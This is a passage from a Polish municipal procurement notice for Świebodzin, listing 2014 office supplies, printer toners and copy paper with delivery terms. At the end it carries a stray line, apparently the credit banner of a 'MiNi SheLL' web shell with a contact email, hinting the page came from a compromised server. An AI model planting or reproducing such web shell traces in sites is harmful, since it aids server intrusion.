24. Kalka ołówkowa A4 niebieska pakowana po 50 arkuszy - 3 szt.
25. Zszywki 24/6 1000 szt. w opak. - 300 opak.       
26. Zszywki 26/8 1000 szt. w opak. - 10 opak.
27. Fascykuły bezkwasowe ze sznurkiem do archiwizacji dokumentów, format A4 z czterema otworami (otwory na prawym i lewym boku przez środek) - 1 000 komp.
28. Spinacze małe 28 mm - po 100 szt. w opak. - 150 opak.
29. Spinacze duże 50 mm - po 100 szt. w opak. - 20 opak.
30. Przekładki kartonowe do segregowania dokumentów, format: 240x105 mm, różne kolory, pakowane po 100 szt. - 1 opak.
31. Skoroszyt oczkowy, kartonowy, pełny A4 - 490 szt.
32. Taśma klejąca szeroka, przezroczysta, wymiary 48 x 50 mm - 30 szt.
33. Teczka A4 do podpisu dokumentów, wykonana ze sztywnej tektury,19 przekładek z otworami, kolory: ? - granatowe, ? zielone - 10 szt.
34. Skoroszyt plastikowy A4 z oczkami do zawieszania w segregatorze - 300 szt.
35. Zszywacz do papieru, wykonany z metalu z wykończeniem z tworzywa sztucznego, zszywający do 30 kartek, do zszywek o wymiarach: 24/6 i 26x6 mm, pojemność 100 zszywek - 10 szt.
36. Zszywacz do papieru, wykonany z metalu zszywający do 50 kartek, do zszywek o wymiarach: 24/6-24/8 i 26x6 mm, zszywanie zamknięte i otwarte - 5 szt.
37. Zszywacz do 60 kartek wykorzystujący najnowszą technologię SuperFlatClinchTM oraz Press Less, na zszywki 26/8+ lub 24/8+, pojemność magazynka: do 103 lub do 141 zszywek - 5 szt.
38. Zszywacz archiwizacyjny, metalowy, wyposażony w stabilną podstawę i wskaźnik ilości zszywek. Zszywający jednorazowo do 240 kartek, na zszywki: 23/6, 23/8, 23/10, 23/13, 23/15, 23/17, 23/20, 23/24 - 3 szt. 
39. Dziurkacz archiwizacyjny do dziurkowania jednorazowo do 100 kartek (max. 110), wyposażony w metalową podstawę i dźwignię, ergonomiczny korpus, głębokość wsuwania kartek 12 mm - 4 szt. 
40. Dziurkacz, wytrzymały wykonany z metalowej dźwigni i podstawy, dziurkujący jednorazowo do 65 kartek, wyposażony w blokadę dźwigni i listwę formatową - 3 szt. 
41. Dziurkacz dziurkujący jednorazowo do 40 kartek, z ogranicznikiem formatu - 7 szt.
42. Folia do bindowania A4, pakowana po 100 ark., grubość 150 mic. (przezroczysta bez koloru) - 2 opak.
43. Okładki papierowe do bindowania, format A4, pakowane po 100 ark., kolor czarny - 1 opak.
44. Grzbiety do bindowania 14 mm, plastikowe, kolor czarny, pakowane po 100 szt. - 1 opak.
45. Grzbiety do bindowania 19 mm, plastikowe, kolor czarny, pakowane po 100 szt. - 1 opak.
46. Grzbiety do bindowania 16 mm, plastikowe, kolor czarny, pakowane po 100 szt. - 2 opak.
47. Kalkulator - 5 szt.
48. Kalkulator z dwukolorową drukarką na papier 58 mm - 4 szt.
49. Klej do dowodów osobistych 30 ml. w rolce - 50 szt.
50. Klej biurowy, uniwersalny, biały w tubie 40 ml - 150 szt. 
51. Nożyczki biurowe ze stali hartowanej, ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego, Wymiar: 20,5 cm - 10 szt.
52. Taśma węglowa do maszyny elektrycznej typ Optima SP 20 - 2 szt.
53. Taśma korekcyjna do węgla do maszyny elektrycznej typ Optima SP 20, pakowane po 5 szt. - 1 opak.
54. Taśma barwiąca czarno-czerwona do maszynek liczących, 6 m - 20 szt. 
55. Wąsy skoroszytowe - 100 szt.
56. Klip do papieru, metalowy, rozmiar - 51 mm, kolor czarny, pakowane po 12 szt. - 2 opak.
57. Klip do papieru, metalowy, rozmiar - 32 mm, kolor czarny, pakowane po 12 szt. - 3 opak.
58. Folia do laminacji dokumentów, format  A4, grubość 80 mikronów,  pakowana po 100 arkuszy, przezroczysta - 2 opak.
59. Folia do laminacji dokumentów, format  A5, grubość 80 mikronów, pakowana po 100 arkuszy, przezroczysta - 2 opak.
60. Gumki recepturki - 100 szt. w opak. - 10 opak.
61. Karteczki samoprzylepne, żółte - wymiar: 76x76 mm, po 100 kartek w opak. - 20 opak.
62. Pinezki niklowane po 100 szt. w opak. - 4 opak.
63. Tacka na dokumenty, plastikowa o formacie A4, wymiary ok 346x255x66 mm, przezroczysta lub półprzezroczysta - 12 szt.
64. Długopis na sprężynce do 1,5 m, wymienny wkład piszący - 12 szt.

Zadanie 2: Na potrzeby Wydziału Oświaty, Kultury i Sportu, w następującym asortymencie:
1. Blok techniczny A4 kolor - 200 szt.
2. Blok techniczny A4 biały - 250 szt.
3. Brystol A1 biały pakowany po 20 szt. w opakowaniu - 20 opak.
4. Brystol A1 kolory: żółty, czerwony, niebieski, zielony pakowany po 20 szt. - 16 opak. - po 4 opak. z każdego koloru
5. Taśma klejąca - szer. 2 cm - 100 szt.
6. Nożyczki biurowe ze stali hartowanej, ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego, wymiar: 20,5 cm - 30 szt.
7. Ołówek B, pakowane po 12 szt. w opakowaniu - 40 opak.
8. Ołówek B-4, pakowane po 12 szt. w opakowaniu - 40 opak.
9. Klej biurowy, uniwersalny, biały w tubie 40 ml - 70 szt.
10. Długopis żelowy z metalową końcówką,  wodoodporny i nieblaknący - niebieski - 250 szt.
11. Długopis zwykły - niebieski - 250 szt.
12. Marker czarny ścięty - 300 szt.
13. Marker ścięty kolor - czerwony, niebieski, zielony - 600 szt. - po 200 szt. z każdego koloru
14. Papier pakowy szary n/b 40g - 800 szt.

2. Wykonawca ponosi koszty dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z Grupy I (Zadanie 1) do magazynu Urzędu Miejskiego w Świebodzinie przy ul. Rynkowej 2, artykuły z Grupy I (Zadanie 2) do Świetlicy Inicjatyw Twórczych w Świebodzinie przy ul. Bramkowej 2 i koszty opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu oraz wszelkie inne koszty niezbędne do wykonania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.95.00-5, 30.19.92.30-1, 30.19.73.30-8, 30.19.76.00-2, 30.19.73.20-5, 22.80.00.00-8, 22.81.60.00-3, 24.91.00.00-6, 30.23.74.30-2, 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa II: Dostawa materiałów eksploatacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Dostawa materiałów biurowych, eksploatacyjnych i papieru kserograficznego w roku 2014 z podziałem na 3 grupy, obejmujące:    

1.1. Grupa II: Dostawa materiałów eksploatacyjnych:

Zadanie 1: Na potrzeby Urzędu Miejskiego w Świebodzinie, w następującym asortymencie:
1. Tusz HP (45) 51645a (czarny) - 2 szt. 
2. Tusz HP (78) c6578a (kolor) - 2 szt.
3. Tusz HP (82) C4913A (69 ml) (Yelow) - 1 szt.
4. Toner HP C7115A - 24 szt.
5. Toner HP Q5949A - 10 szt.
6. Toner HP CE278A - 30 szt.
7. Toner HP Q7553X - 2 szt.
8. Toner HP Q2612A - 2 szt.
9. Toner HP CE505x - 1 szt.
10. Toner Lexmark 0064016HE (21000 kopii) - 10 szt. 
11. Toner Lexmark E260A11E - 1 szt.
12. Toner Samsung SCX-D4200A - 4 szt. 
13. Toner konica minolta A0DKJ51 (CMY) - 1 szt.
14. Toner konica minolta A0DK151 (Black) - 2 szt.
15. Taśma barwiąca do Lexmark 4227+ (00L130034) - 6 szt.
16. Taśma barwiąca do OKI 6300 - 8 szt.
17. Sprężone powietrze - min 300 ml - 10 szt.
18. Toner Panasonic KX-FA83x - 2 szt.
19. Bęben Panasonic KX-FA84E - 1 szt.
20. Toner kit Kyocera TK-3130 (25000 kopii) - 12 szt.
21. Toner kit Kyocera TK-3100 (12500 kopii) - 2 szt.
22. Toner kit Kyocera TK-1140 (7200 kopii) - 7 szt.
23. Tusz Brother LC1280XL-BK - 2 szt.
24. Tusz Brother LC1280XL-Y - 1 szt.
25. Tusz Brother LC1280XL-C - 1 szt.
26. Tusz Brother LC1280XL-M - 1 szt.
27. Toner HP C4127A - 2 szt.

Zadanie 2: Na potrzeby Wydziału Oświaty, Kultury i Sportu, w następującym asortymencie:
1. Tusz HP nr 301 kolor, do urządzenia wielofunkcyjnego HPDJ 2050A - 5 szt.
2. Tusz HP nr 301 czarny, do urządzenia wielofunkcyjnego HPDJ 2050A - 5 szt.
3. Toner nr 85A - 3 szt.
4. Toner nr 49A - 1 szt.

2. Wykonawca ponosi koszty dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z Grupy II (Zadanie 1) do magazynu Urzędu Miejskiego w Świebodzinie przy ul. Rynkowej 2, artykuły z Grupy II (Zadanie 2) do Świetlicy Inicjatyw Twórczych w Świebodzinie przy ul. Bramkowej 2 i koszty opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu oraz wszelkie inne koszty niezbędne do wykonania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 22.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa III: Dostawa papieru kserograficznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Dostawa materiałów biurowych, eksploatacyjnych i papieru kserograficznego w roku 2014 z podziałem na 3 grupy, obejmujące:    

1.1. Grupa III: Dostawa papieru kserograficznego:

Zadanie 1: Na potrzeby Urzędu Miejskiego w Świebodzinie, w następującym asortymencie:
1. Papier ksero A4 80g/m2, biały CIE 146, pakowany fabrycznie po 500 ark. w ryzie zgodny z PN-EN ISO 9706, wilgotność 3-5% - 2 350 ryz 
2. Papier A4, 160 g, biały, pakowany fabrycznie po 250 ark. w ryzie - 5 ryz
3. Papier A4, 80 g, jasny żółty, pakowany fabrycznie po 500 ark. w ryzie - 1 ryza
4. Papier komputerowy - 250 x 12, 1+0 (składanka perforowana 2000 szt.) - 4 kartony
5. Papier komputerowy - 250 x 12, 1+1 (składanka perforowana 900 szt.) - 20 kartonów
6. Papier komputerowy - 250 x 12, 1+2 (składanka perforowana 600 szt.) - 18 kartonów
7. Papier komputerowy - 360 x 12, 1+0 (składanka perforowana 2000 szt.) - 10 kartonów
8. Papier komputerowy - 360 x 12, 1+1 (składanka perforowana 900 szt.) - 4 kartony

Zadanie 2: Na potrzeby Wydziału Oświaty, Kultury i Sportu, w następującym asortymencie:
1. Papier ksero A4 80g/m2, biały CIE146, pakowany fabrycznie po 500 ark. w ryzie zgodny z PN-EN ISO 9706, wilgotność 3-5% - 30 ryz 
2. Papier ksero A4 kolorowy: żółty, niebieski, zielony, liliowy, 80g/m2, pakowany fabrycznie po 500 ark.  w ryzie, wilgotność 3-5% - 16 ryz - po 4 ryzy z każdego koloru

2. Wykonawca ponosi koszty dostawy i rozładunku artykułów we wskazane miejsca tj. artykuły z Grupy III (Zadanie 1) do magazynu Urzędu Miejskiego w Świebodzinie przy ul. Rynkowej 2, artykuły z Grupy III (Zadanie 2) do Świetlicy Inicjatyw Twórczych w Świebodzinie przy ul. Bramkowej 2 i koszty opakowania zabezpieczającego artykuły przed uszkodzeniem w trakcie transportu oraz wszelkie inne koszty niezbędne do wykonania przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.93.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com